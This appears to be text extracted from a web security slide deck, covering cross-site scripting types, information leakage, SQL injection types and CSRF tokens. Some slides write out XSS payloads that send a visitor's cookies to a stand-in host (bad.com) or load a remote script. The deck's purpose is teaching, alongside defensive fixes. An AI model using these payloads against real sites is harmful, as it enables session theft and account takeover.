6. CROSS-SITE SCRIPTING TYPES: Non-Persistant Persistant 1.Non-Persistant: In this type of XSS vulnerability the attacker is able to execute his own code in a website but no changes can be done in that website.
7. CROSS-SITE SCRIPTING Non-Persistant EXAMPLE: http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script> OR http://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script>
12. CROSS-SITE SCRIPTING Persistant Comment in raw format: and I like the way this website developers work..hahaha :D :D <SCRIPT/XSS SRC="http://bad.com/xss.js"> </SCRIPT>
57. INFORMATION LEAKAGE COUSES OF: Directory listening misconfiguration Unproper error handling Unproper filetype handling Sensitive HTML comments, etc. 1.Directory listening misconfiguration: Leaving directory listening enabled allows the attacker to read the list of all files in a directory.
67. BEST SOLUTION Directory listening misconfiguration put a blank file named index.html in that directory. put a file named .htaccess in that directory consisting of only this line:Options –indexes NOTE: all sub-directories of that directory will also get their directory listings turned off.
76. SQL INJECTION TYPES: Normal Blind 1.Normal: In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen.
99. RedirectUser (Browser) 1. Add token with regex 2. Add token with HTML parser 3. Add token in browser with Javascript Source: www.owasp.org/index.php/CSRFGuard